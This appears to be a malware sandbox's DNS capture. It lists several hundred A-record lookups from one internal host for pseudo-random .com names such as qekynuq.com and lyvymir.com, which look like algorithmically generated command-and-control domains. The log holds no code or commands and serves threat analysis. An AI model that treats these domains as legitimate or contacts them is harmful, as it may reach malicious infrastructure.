                                                                                                                                                                                                          Nov 11, 2024 18:24:37.103780985 CET192.168.2.81.1.1.10xd8a5Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.104015112 CET192.168.2.81.1.1.10x7428Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.111479044 CET192.168.2.81.1.1.10xf6d7Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.111676931 CET192.168.2.81.1.1.10xc3c9Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.111851931 CET192.168.2.81.1.1.10xf940Standard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.112029076 CET192.168.2.81.1.1.10x36e9Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.112392902 CET192.168.2.81.1.1.10xd8a3Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.112636089 CET192.168.2.81.1.1.10xc53dStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.112840891 CET192.168.2.81.1.1.10x31b2Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.113104105 CET192.168.2.81.1.1.10x9a08Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.113277912 CET192.168.2.81.1.1.10xc417Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.113471985 CET192.168.2.81.1.1.10x860aStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.113658905 CET192.168.2.81.1.1.10x28b5Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.113903999 CET192.168.2.81.1.1.10x608Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.114120007 CET192.168.2.81.1.1.10xea2eStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.114326954 CET192.168.2.81.1.1.10xa46cStandard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.114415884 CET192.168.2.81.1.1.10x285aStandard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.116215944 CET192.168.2.81.1.1.10xe161Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.116404057 CET192.168.2.81.1.1.10xe878Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.116579056 CET192.168.2.81.1.1.10x4158Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.116925955 CET192.168.2.81.1.1.10x6d13Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.688967943 CET192.168.2.81.1.1.10x9d84Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.690058947 CET192.168.2.81.1.1.10x1859Standard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.693622112 CET192.168.2.81.1.1.10xad77Standard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.695811987 CET192.168.2.81.1.1.10xbd0cStandard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.696930885 CET192.168.2.81.1.1.10xfb63Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.707705021 CET192.168.2.81.1.1.10xd91eStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.708297014 CET192.168.2.81.1.1.10xc687Standard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.709238052 CET192.168.2.81.1.1.10x9fdaStandard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.728101015 CET192.168.2.81.1.1.10x525Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.738455057 CET192.168.2.81.1.1.10x1b23Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.738826036 CET192.168.2.81.1.1.10x93d7Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.739465952 CET192.168.2.81.1.1.10x6034Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.739748955 CET192.168.2.81.1.1.10x44edStandard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.753915071 CET192.168.2.81.1.1.10xd726Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.754126072 CET192.168.2.81.1.1.10x4ec9Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.857701063 CET192.168.2.81.1.1.10xcf61Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.858026028 CET192.168.2.81.1.1.10x8c15Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.858026981 CET192.168.2.81.1.1.10x24a6Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.858160973 CET192.168.2.81.1.1.10xca7fStandard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.858442068 CET192.168.2.81.1.1.10xde4bStandard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.858584881 CET192.168.2.81.1.1.10xdca1Standard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.858871937 CET192.168.2.81.1.1.10x5992Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.859339952 CET192.168.2.81.1.1.10x3fe7Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.859359026 CET192.168.2.81.1.1.10x6097Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.859735966 CET192.168.2.81.1.1.10xf145Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.859817028 CET192.168.2.81.1.1.10x4005Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.860141039 CET192.168.2.81.1.1.10xf54eStandard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.860295057 CET192.168.2.81.1.1.10x48e4Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.861085892 CET192.168.2.81.1.1.10x49cStandard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.861568928 CET192.168.2.81.1.1.10x19e1Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.861735106 CET192.168.2.81.1.1.10x47b2Standard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.861927986 CET192.168.2.81.1.1.10xc394Standard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.862082958 CET192.168.2.81.1.1.10x9cbbStandard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.862672091 CET192.168.2.81.1.1.10x1b18Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.864553928 CET192.168.2.81.1.1.10x8d9Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.865299940 CET192.168.2.81.1.1.10xcffcStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.868648052 CET192.168.2.81.1.1.10x30a4Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.868678093 CET192.168.2.81.1.1.10x859Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.883444071 CET192.168.2.81.1.1.10x26daStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.883915901 CET192.168.2.81.1.1.10xd26dStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.885466099 CET192.168.2.81.1.1.10x3a5dStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.888839960 CET192.168.2.81.1.1.10xedbdStandard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.889105082 CET192.168.2.81.1.1.10xbaacStandard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.889319897 CET192.168.2.81.1.1.10xe42cStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.919401884 CET192.168.2.81.1.1.10x7bd7Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.920979977 CET192.168.2.81.1.1.10x4567Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.921324968 CET192.168.2.81.1.1.10x47f5Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.921495914 CET192.168.2.81.1.1.10x16a7Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.922825098 CET192.168.2.81.1.1.10xbcbbStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.923007011 CET192.168.2.81.1.1.10x8a49Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.923398972 CET192.168.2.81.1.1.10xa1f9Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.923558950 CET192.168.2.81.1.1.10xfdf2Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.923969030 CET192.168.2.81.1.1.10xec44Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.924134970 CET192.168.2.81.1.1.10xf22Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.924354076 CET192.168.2.81.1.1.10x7e4Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.924504042 CET192.168.2.81.1.1.10x8755Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.930964947 CET192.168.2.81.1.1.10x6122Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.931524038 CET192.168.2.81.1.1.10xf146Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.933687925 CET192.168.2.81.1.1.10x5aa3Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.934570074 CET192.168.2.81.1.1.10x9d3bStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.934952021 CET192.168.2.81.1.1.10x6d14Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.935211897 CET192.168.2.81.1.1.10x8535Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.935689926 CET192.168.2.81.1.1.10x17bcStandard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.094420910 CET192.168.2.81.1.1.10x2cf0Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.416169882 CET192.168.2.81.1.1.10x3a16Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.416476965 CET192.168.2.81.1.1.10xb976Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.418514967 CET192.168.2.81.1.1.10x4177Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.419037104 CET192.168.2.81.1.1.10x1a8dStandard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.419090033 CET192.168.2.81.1.1.10xb4d8Standard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.421283960 CET192.168.2.81.1.1.10xc48aStandard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.421477079 CET192.168.2.81.1.1.10x646fStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.423381090 CET192.168.2.81.1.1.10x62ebStandard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.424128056 CET192.168.2.81.1.1.10x9ce6Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.433895111 CET192.168.2.81.1.1.10x160bStandard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.441235065 CET192.168.2.81.1.1.10x92aaStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.442106962 CET192.168.2.81.1.1.10x82faStandard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.442538977 CET192.168.2.81.1.1.10x20ccStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.446847916 CET192.168.2.81.1.1.10x2c01Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.453032017 CET192.168.2.81.1.1.10x10b7Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.478811026 CET192.168.2.81.1.1.10x3c2Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.481283903 CET192.168.2.81.1.1.10x8d3bStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.481653929 CET192.168.2.81.1.1.10x6e3fStandard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.482588053 CET192.168.2.81.1.1.10x5239Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.509675980 CET192.168.2.81.1.1.10x3a4eStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510071993 CET192.168.2.81.1.1.10xbae9Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510128975 CET192.168.2.81.1.1.10x8547Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510423899 CET192.168.2.81.1.1.10x8580Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510746956 CET192.168.2.81.1.1.10x98adStandard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.510876894 CET192.168.2.81.1.1.10xf90dStandard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.511131048 CET192.168.2.81.1.1.10xb01bStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.511177063 CET192.168.2.81.1.1.10x157bStandard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.511571884 CET192.168.2.81.1.1.10xe096Standard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.516335011 CET192.168.2.81.1.1.10x7e67Standard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.516415119 CET192.168.2.81.1.1.10x41edStandard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.516663074 CET192.168.2.81.1.1.10xbe61Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.516937971 CET192.168.2.81.1.1.10x52a6Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517100096 CET192.168.2.81.1.1.10x64f7Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517254114 CET192.168.2.81.1.1.10xeb87Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517405033 CET192.168.2.81.1.1.10xe444Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517606974 CET192.168.2.81.1.1.10xd20dStandard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517676115 CET192.168.2.81.1.1.10x1a7eStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517808914 CET192.168.2.81.1.1.10x1adfStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517962933 CET192.168.2.81.1.1.10x76d7Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.517991066 CET192.168.2.81.1.1.10x6683Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518110037 CET192.168.2.81.1.1.10xf72Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518210888 CET192.168.2.81.1.1.10xc7d2Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518325090 CET192.168.2.81.1.1.10x2fe5Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518543959 CET192.168.2.81.1.1.10x8eb5Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.518698931 CET192.168.2.81.1.1.10xd43Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.519081116 CET192.168.2.81.1.1.10x1d9dStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.519481897 CET192.168.2.81.1.1.10x5fbStandard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.519660950 CET192.168.2.81.1.1.10x173aStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.519751072 CET192.168.2.81.1.1.10x46e2Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.519906044 CET192.168.2.81.1.1.10x58ddStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.520101070 CET192.168.2.81.1.1.10x1354Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.525320053 CET192.168.2.81.1.1.10x722dStandard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.529964924 CET192.168.2.81.1.1.10xb67Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.536258936 CET192.168.2.81.1.1.10xdcffStandard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.536444902 CET192.168.2.81.1.1.10x198aStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.536912918 CET192.168.2.81.1.1.10x809eStandard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.537473917 CET192.168.2.81.1.1.10xc17dStandard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.538980961 CET192.168.2.81.1.1.10xb5acStandard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.539210081 CET192.168.2.81.1.1.10x7f3dStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.540220976 CET192.168.2.81.1.1.10xecc1Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.546963930 CET192.168.2.81.1.1.10x7d5eStandard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:39.547741890 CET192.168.2.81.1.1.10x17ccStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:40.507334948 CET192.168.2.81.1.1.10x58d5Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:40.511532068 CET192.168.2.81.1.1.10xf182Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:40.513952971 CET192.168.2.81.1.1.10xb9c4Standard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:40.556271076 CET192.168.2.81.1.1.10xeb5cStandard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:40.559422016 CET192.168.2.81.1.1.10xd62cStandard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:40.594978094 CET192.168.2.81.1.1.10xd4f4Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:40.595650911 CET192.168.2.81.1.1.10xcfecStandard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.671025991 CET192.168.2.81.1.1.10xe05cStandard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.671446085 CET192.168.2.81.1.1.10x69aStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.671446085 CET192.168.2.81.1.1.10xd2aeStandard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.671520948 CET192.168.2.81.1.1.10xe32cStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.675390959 CET192.168.2.81.1.1.10x62dfStandard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.678124905 CET192.168.2.81.1.1.10x9c16Standard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.722958088 CET192.168.2.81.1.1.10x6d7eStandard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.725117922 CET192.168.2.81.1.1.10x3a07Standard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.725923061 CET192.168.2.81.1.1.10xdce7Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.726244926 CET192.168.2.81.1.1.10x51b7Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.755614042 CET192.168.2.81.1.1.10xa050Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.755800009 CET192.168.2.81.1.1.10x10efStandard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.756026983 CET192.168.2.81.1.1.10x2805Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.756186008 CET192.168.2.81.1.1.10xcefaStandard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.757100105 CET192.168.2.81.1.1.10xe9aStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.757296085 CET192.168.2.81.1.1.10x3137Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.757448912 CET192.168.2.81.1.1.10x96e7Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.758300066 CET192.168.2.81.1.1.10x9108Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.758517981 CET192.168.2.81.1.1.10xb876Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.758683920 CET192.168.2.81.1.1.10x4f1cStandard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.759088993 CET192.168.2.81.1.1.10xc3e5Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.759251118 CET192.168.2.81.1.1.10x490dStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.760005951 CET192.168.2.81.1.1.10x26a8Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.760710955 CET192.168.2.81.1.1.10x2693Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.761168003 CET192.168.2.81.1.1.10x8d79Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.761296034 CET192.168.2.81.1.1.10x5458Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.761455059 CET192.168.2.81.1.1.10xc25bStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.761821032 CET192.168.2.81.1.1.10xc0afStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:41.762151957 CET192.168.2.81.1.1.10xfa02Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
